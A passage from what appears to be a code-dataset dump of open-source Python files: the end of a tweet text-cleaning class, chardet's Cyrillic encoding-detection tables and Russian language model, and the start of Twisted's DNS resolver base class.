return self.tweet
def remove_word(self, tweet, stopword):
if tweet != None:
t = ''
for word in tweet.split():
if word == stopword:
pass
else:
t += word + ' '
return t
else:
pass
def remove(self, tweet, key):
t = ''
for word in tweet.split():
if word.find(key) != -1:
pass
else:
t += word + ' '
return t
def near(self, tweet, key, value):
t = ''
for word in tweet.split():
if word == key:
t += value + ' '
else:
t += word + ' '
return t
| mit |
rembo10/headphones | lib/requests/packages/chardet/langcyrillicmodel.py | 2762 | 17725 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
# KOI8-R language model
# Character Mapping Table:
KOI8R_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40
155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50
253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60
67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70
191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206, # 80
207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222, # 90
223,224,225, 68,226,227,228,229,230,231,232,233,234,235,236,237, # a0
238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253, # b0
27, 3, 21, 28, 13, 2, 39, 19, 26, 4, 23, 11, 8, 12, 5, 1, # c0
15, 16, 9, 7, 6, 14, 24, 10, 17, 18, 20, 25, 30, 29, 22, 54, # d0
59, 37, 44, 58, 41, 48, 53, 46, 55, 42, 60, 36, 49, 38, 31, 34, # e0
35, 43, 45, 32, 40, 52, 56, 33, 61, 62, 51, 57, 47, 63, 50, 70, # f0
)
win1251_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40
155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50
253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60
67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70
191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,
207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,
223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,
239,240,241,242,243,244,245,246, 68,247,248,249,250,251,252,253,
37, 44, 33, 46, 41, 48, 56, 51, 42, 60, 36, 49, 38, 31, 34, 35,
45, 32, 40, 52, 53, 55, 58, 50, 57, 63, 70, 62, 61, 47, 59, 43,
3, 21, 10, 19, 13, 2, 24, 20, 4, 23, 11, 8, 12, 5, 1, 15,
9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27, 16,
)
latin5_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40
155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50
253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60
67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70
191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,
207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,
223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,
37, 44, 33, 46, 41, 48, 56, 51, 42, 60, 36, 49, 38, 31, 34, 35,
45, 32, 40, 52, 53, 55, 58, 50, 57, 63, 70, 62, 61, 47, 59, 43,
3, 21, 10, 19, 13, 2, 24, 20, 4, 23, 11, 8, 12, 5, 1, 15,
9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27, 16,
239, 68,240,241,242,243,244,245,246,247,248,249,250,251,252,255,
)
macCyrillic_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40
155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50
253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60
67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70
37, 44, 33, 46, 41, 48, 56, 51, 42, 60, 36, 49, 38, 31, 34, 35,
45, 32, 40, 52, 53, 55, 58, 50, 57, 63, 70, 62, 61, 47, 59, 43,
191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,
207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,
223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,
239,240,241,242,243,244,245,246,247,248,249,250,251,252, 68, 16,
3, 21, 10, 19, 13, 2, 24, 20, 4, 23, 11, 8, 12, 5, 1, 15,
9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27,255,
)
IBM855_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40
155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50
253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60
67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70
191,192,193,194, 68,195,196,197,198,199,200,201,202,203,204,205,
206,207,208,209,210,211,212,213,214,215,216,217, 27, 59, 54, 70,
3, 37, 21, 44, 28, 58, 13, 41, 2, 48, 39, 53, 19, 46,218,219,
220,221,222,223,224, 26, 55, 4, 42,225,226,227,228, 23, 60,229,
230,231,232,233,234,235, 11, 36,236,237,238,239,240,241,242,243,
8, 49, 12, 38, 5, 31, 1, 34, 15,244,245,246,247, 35, 16,248,
43, 9, 45, 7, 32, 6, 40, 14, 52, 24, 56, 10, 33, 17, 61,249,
250, 18, 62, 20, 51, 25, 57, 30, 47, 29, 63, 22, 50,251,252,255,
)
IBM866_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40
155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50
253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60
67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70
37, 44, 33, 46, 41, 48, 56, 51, 42, 60, 36, 49, 38, 31, 34, 35,
45, 32, 40, 52, 53, 55, 58, 50, 57, 63, 70, 62, 61, 47, 59, 43,
3, 21, 10, 19, 13, 2, 24, 20, 4, 23, 11, 8, 12, 5, 1, 15,
191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,
207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,
223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,
9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27, 16,
239, 68,240,241,242,243,244,245,246,247,248,249,250,251,252,255,
)
# Model Table:
# total sequences: 100%
# first 512 sequences: 97.6601%
# first 1024 sequences: 2.3389%
# rest sequences: 0.1237%
# negative sequences: 0.0009%
RussianLangModel = (
0,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,1,1,3,3,3,3,1,3,3,3,2,3,2,3,3,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,0,3,2,2,2,2,2,0,0,2,
3,3,3,2,3,3,3,3,3,3,3,3,3,3,2,3,3,0,0,3,3,3,3,3,3,3,3,3,2,3,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,2,2,3,3,3,3,3,3,3,3,3,2,3,3,0,0,3,3,3,3,3,3,3,3,2,3,3,1,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,2,3,2,3,3,3,3,3,3,3,3,3,3,3,3,3,0,0,3,3,3,3,3,3,3,3,3,3,3,2,1,
0,0,0,0,0,0,0,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,0,0,3,3,3,3,3,3,3,3,3,3,3,2,1,
0,0,0,0,0,1,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,2,2,2,3,1,3,3,1,3,3,3,3,2,2,3,0,2,2,2,3,3,2,1,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,2,3,3,3,3,3,2,2,3,2,3,3,3,2,1,2,2,0,1,2,2,2,2,2,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,2,2,3,0,2,2,3,3,2,1,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,1,0,0,2,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,2,3,3,1,2,3,2,2,3,2,3,3,3,3,2,2,3,0,3,2,2,3,1,1,1,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,2,2,3,3,3,3,3,2,3,3,3,3,2,2,2,0,3,3,3,2,2,2,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,2,3,2,3,3,3,3,3,3,2,3,2,2,0,1,3,2,1,2,2,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,3,2,1,1,3,0,1,1,1,1,2,1,1,0,2,2,2,1,2,0,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,2,3,3,2,2,2,2,1,3,2,3,2,3,2,1,2,2,0,1,1,2,1,2,1,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,3,3,2,2,3,2,3,3,3,2,2,2,2,0,2,2,2,2,3,1,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,
3,2,3,2,2,3,3,3,3,3,3,3,3,3,1,3,2,0,0,3,3,3,3,2,3,3,3,3,2,3,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,3,3,3,3,3,2,2,3,3,0,2,1,0,3,2,3,2,3,0,0,1,2,0,0,1,0,1,2,1,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,3,0,2,3,3,3,3,2,3,3,3,3,1,2,2,0,0,2,3,2,2,2,3,2,3,2,2,3,0,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,2,3,0,2,3,2,3,0,1,2,3,3,2,0,2,3,0,0,2,3,2,2,0,1,3,1,3,2,2,1,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,1,3,0,2,3,3,3,3,3,3,3,3,2,1,3,2,0,0,2,2,3,3,3,2,3,3,0,2,2,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,2,2,3,3,2,2,2,3,3,0,0,1,1,1,1,1,2,0,0,1,1,1,1,0,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,2,2,3,3,3,3,3,3,3,0,3,2,3,3,2,3,2,0,2,1,0,1,1,0,1,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,2,3,3,3,2,2,2,2,3,1,3,2,3,1,1,2,1,0,2,2,2,2,1,3,1,0,
0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,
2,2,3,3,3,3,3,1,2,2,1,3,1,0,3,0,0,3,0,0,0,1,1,0,1,2,1,0,0,0,0,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,2,2,1,1,3,3,3,2,2,1,2,2,3,1,1,2,0,0,2,2,1,3,0,0,2,1,1,2,1,1,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,2,3,3,3,3,1,2,2,2,1,2,1,3,3,1,1,2,1,2,1,2,2,0,2,0,0,1,1,0,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,3,3,3,3,3,2,1,3,2,2,3,2,0,3,2,0,3,0,1,0,1,1,0,0,1,1,1,1,0,1,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,2,3,3,3,2,2,2,3,3,1,2,1,2,1,0,1,0,1,1,0,1,0,0,2,1,1,1,0,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,
3,1,1,2,1,2,3,3,2,2,1,2,2,3,0,2,1,0,0,2,2,3,2,1,2,2,2,2,2,3,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,1,1,0,1,1,2,2,1,1,3,0,0,1,3,1,1,1,0,0,0,1,0,1,1,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,1,3,3,3,2,0,0,0,2,1,0,1,0,2,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,0,1,0,0,2,3,2,2,2,1,2,2,2,1,2,1,0,0,1,1,1,0,2,0,1,1,1,0,0,1,1,
1,0,0,0,0,0,1,2,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,
2,3,3,3,3,0,0,0,0,1,0,0,0,0,3,0,1,2,1,0,0,0,0,0,0,0,1,1,0,0,1,1,
1,0,1,0,1,2,0,0,1,1,2,1,0,1,1,1,1,0,1,1,1,1,0,1,0,0,1,0,0,1,1,0,
2,2,3,2,2,2,3,1,2,2,2,2,2,2,2,2,1,1,1,1,1,1,1,0,1,0,1,1,1,0,2,1,
1,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,1,1,1,0,1,0,1,1,0,1,1,1,0,1,1,0,
3,3,3,2,2,2,2,3,2,2,1,1,2,2,2,2,1,1,3,1,2,1,2,0,0,1,1,0,1,0,2,1,
1,1,1,1,1,2,1,0,1,1,1,1,0,1,0,0,1,1,0,0,1,0,1,0,0,1,0,0,0,1,1,0,
2,0,0,1,0,3,2,2,2,2,1,2,1,2,1,2,0,0,0,2,1,2,2,1,1,2,2,0,1,1,0,2,
1,1,1,1,1,0,1,1,1,2,1,1,1,2,1,0,1,2,1,1,1,1,0,1,1,1,0,0,1,0,0,1,
1,3,2,2,2,1,1,1,2,3,0,0,0,0,2,0,2,2,1,0,0,0,0,0,0,1,0,0,0,0,1,1,
1,0,1,1,0,1,0,1,1,0,1,1,0,2,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,1,1,0,
2,3,2,3,2,1,2,2,2,2,1,0,0,0,2,0,0,1,1,0,0,0,0,0,0,0,1,1,0,0,2,1,
1,1,2,1,0,2,0,0,1,0,1,0,0,1,0,0,1,1,0,1,1,0,0,0,0,0,1,0,0,0,0,0,
3,0,0,1,0,2,2,2,3,2,2,2,2,2,2,2,0,0,0,2,1,2,1,1,1,2,2,0,0,0,1,2,
1,1,1,1,1,0,1,2,1,1,1,1,1,1,1,0,1,1,1,1,1,1,0,1,1,1,1,1,1,0,0,1,
2,3,2,3,3,2,0,1,1,1,0,0,1,0,2,0,1,1,3,1,0,0,0,0,0,0,0,1,0,0,2,1,
1,1,1,1,1,1,1,0,1,0,1,1,1,1,0,1,1,1,0,0,1,1,0,1,0,0,0,0,0,0,1,0,
2,3,3,3,3,1,2,2,2,2,0,1,1,0,2,1,1,1,2,1,0,1,1,0,0,1,0,1,0,0,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,3,3,3,2,0,0,1,1,2,2,1,0,0,2,0,1,1,3,0,0,1,0,0,0,0,0,1,0,1,2,1,
1,1,2,0,1,1,1,0,1,0,1,1,0,1,0,1,1,1,1,0,1,0,0,0,0,0,0,1,0,1,1,0,
1,3,2,3,2,1,0,0,2,2,2,0,1,0,2,0,1,1,1,0,1,0,0,0,3,0,1,1,0,0,2,1,
1,1,1,0,1,1,0,0,0,0,1,1,0,1,0,0,2,1,1,0,1,0,0,0,1,0,1,0,0,1,1,0,
3,1,2,1,1,2,2,2,2,2,2,1,2,2,1,1,0,0,0,2,2,2,0,0,0,1,2,1,0,1,0,1,
2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,2,1,1,1,0,1,0,1,1,0,1,1,1,0,0,1,
3,0,0,0,0,2,0,1,1,1,1,1,1,1,0,1,0,0,0,1,1,1,0,1,0,1,1,0,0,1,0,1,
1,1,0,0,1,0,0,0,1,0,1,1,0,0,1,0,1,0,1,0,0,0,0,1,0,0,0,1,0,0,0,1,
1,3,3,2,2,0,0,0,2,2,0,0,0,1,2,0,1,1,2,0,0,0,0,0,0,0,0,1,0,0,2,1,
0,1,1,0,0,1,1,0,0,0,1,1,0,1,1,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,1,0,
2,3,2,3,2,0,0,0,0,1,1,0,0,0,2,0,2,0,2,0,0,0,0,0,1,0,0,1,0,0,1,1,
1,1,2,0,1,2,1,0,1,1,2,1,1,1,1,1,2,1,1,0,1,0,0,1,1,1,1,1,0,1,1,0,
1,3,2,2,2,1,0,0,2,2,1,0,1,2,2,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,1,1,
0,0,1,1,0,1,1,0,0,1,1,0,1,1,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,
1,0,0,1,0,2,3,1,2,2,2,2,2,2,1,1,0,0,0,1,0,1,0,2,1,1,1,0,0,0,0,1,
1,1,0,1,1,0,1,1,1,1,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,
2,0,2,0,0,1,0,3,2,1,2,1,2,2,0,1,0,0,0,2,1,0,0,2,1,1,1,1,0,2,0,2,
2,1,1,1,1,1,1,1,1,1,1,1,1,2,1,0,1,1,1,1,0,0,0,1,1,1,1,0,1,0,0,1,
1,2,2,2,2,1,0,0,1,0,0,0,0,0,2,0,1,1,1,1,0,0,0,0,1,0,1,2,0,0,2,0,
1,0,1,1,1,2,1,0,1,0,1,1,0,0,1,0,1,1,1,0,1,0,0,0,1,0,0,1,0,1,1,0,
2,1,2,2,2,0,3,0,1,1,0,0,0,0,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
0,0,0,1,1,1,0,0,1,0,1,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,
1,2,2,3,2,2,0,0,1,1,2,0,1,2,1,0,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,1,
0,1,1,0,0,1,1,0,0,1,1,0,0,1,1,0,1,1,0,0,1,0,0,0,0,0,0,0,0,1,1,0,
2,2,1,1,2,1,2,2,2,2,2,1,2,2,0,1,0,0,0,1,2,2,2,1,2,1,1,1,1,1,2,1,
1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,0,1,1,1,0,0,0,0,1,1,1,0,1,1,0,0,1,
1,2,2,2,2,0,1,0,2,2,0,0,0,0,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,2,0,
0,0,1,0,0,1,0,0,0,0,1,0,1,1,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,
0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,2,2,2,2,0,0,0,2,2,2,0,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1,
0,1,1,0,0,1,1,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,2,2,2,2,0,0,0,0,1,0,0,1,1,2,0,0,0,0,1,0,1,0,0,1,0,0,2,0,0,0,1,
0,0,1,0,0,1,0,0,0,1,1,0,0,0,0,0,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,
1,2,2,2,1,1,2,0,2,1,1,1,1,0,2,2,0,0,0,0,0,0,0,0,0,1,1,0,0,0,1,1,
0,0,1,0,1,1,0,0,0,0,1,0,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,
1,0,2,1,2,0,0,0,0,0,1,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,
0,0,1,0,1,1,0,0,0,0,1,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,
1,0,0,0,0,2,0,1,2,1,0,1,1,1,0,1,0,0,0,1,0,1,0,0,1,0,1,0,0,0,0,1,
0,0,0,0,0,1,0,0,1,1,0,0,1,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,
2,2,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
1,0,0,0,1,0,0,0,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,1,0,0,0,0,0,
2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
1,1,1,0,1,0,1,0,0,1,1,1,1,0,0,0,1,0,0,0,0,1,0,0,0,1,0,1,0,0,0,0,
1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
1,1,0,1,1,0,1,0,1,0,0,0,0,1,1,0,1,1,0,0,0,0,0,1,0,1,1,0,1,0,0,0,
0,1,1,1,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,
)
Koi8rModel = {
'charToOrderMap': KOI8R_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': False,
'charsetName': "KOI8-R"
}
Win1251CyrillicModel = {
'charToOrderMap': win1251_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': False,
'charsetName': "windows-1251"
}
Latin5CyrillicModel = {
'charToOrderMap': latin5_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': False,
'charsetName': "ISO-8859-5"
}
MacCyrillicModel = {
'charToOrderMap': macCyrillic_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': False,
'charsetName': "MacCyrillic"
};
Ibm866Model = {
'charToOrderMap': IBM866_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': False,
'charsetName': "IBM866"
}
Ibm855Model = {
'charToOrderMap': IBM855_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': False,
'charsetName': "IBM855"
}
# flake8: noqa
| gpl-3.0 |
fxia22/ASM_xf | PythonD/site_python/twisted/names/common.py | 2 | 6631 |
# Twisted, the Framework of Your Internet
# Copyright (C) 2001 Matthew W. Lefkowitz
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of version 2.1 of the GNU Lesser General Public
# License as published by the Free Software Foundation.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
import operator, sys, socket, random
from twisted.protocols import dns
from twisted.internet import defer, error
from twisted.python import failure, log
EMPTY_RESULT = (), (), ()
class ResolverBase:
typeToMethod = None
def __init__(self):
self.typeToMethod = {}
for (k, v) in typeToMethod.items():
self.typeToMethod[k] = getattr(self, v)
def query(self, query, timeout = None):
try:
return self.typeToMethod[query.type](str(query.name), timeout)
except KeyError, e:
return defer.fail(failure.Failure(NotImplementedError(str(self.__class__) + " " + str(query.type))))
def _lookup(self, name, cls, type, timeout):
raise NotImplementedError("ResolverBase._lookup")
def lookupAddress(self, name, timeout = None):
return self._lookup(name, dns.IN, dns.A, timeout)
def lookupIPV6Address(self, name, timeout = None):
return self._lookup(name, dns.IN, dns.AAAA, timeout)
def lookupAddress6(self, name, timeout = None):
return self._lookup(name, dns.IN, dns.A6, timeout)
def lookupMailExchange(self, name, timeout = None):
return self._lookup(name, dns.IN, dns.MX, timeout)
def lookupNameservers(self, name, timeout = None):
return self._lookup(name, dns.IN, dns.NS, timeout)
def lookupCanonicalName(self, name, timeout = None):
return self._lookup(name, dns.IN, dns.CNAME, timeout)
def lookupMailBox(self, name, timeout = None):
return self._lookup(name, dns.IN, dns.MB, timeout)
def lookupMailGroup(self, name, timeout = None):
return self._lookup(name, dns.IN, dns.MG, timeout)
def lookupMailRename(self, name, timeout = None):
return self._lookup(name, dns.IN, dns.MR, timeout)
def lookupPointer(self, name, timeout = None):
return self._lookup(name, dns.IN, dns.PTR, timeout)
def lookupAuthority(self, name, timeout = None):
return self._lookup(name, dns.IN, dns.SOA, timeout)
def lookupNull(self, name, timeout = None):
return self._lookup(name, dns.IN, dns.NULL, timeout)
def lookupWellKnownServices(self, name, timeout = None):
return self._lookup(name, dns.IN, dns.WKS, timeout)
def lookupService(self, name, timeout = None):
return self._lookup(name, dns.IN, dns.SRV, timeout)
def lookupHostInfo(self, name, timeout = None):
return self._lookup(name, dns.IN, dns.HINFO, timeout)
def lookupMailboxInfo(self, name, timeout = None):
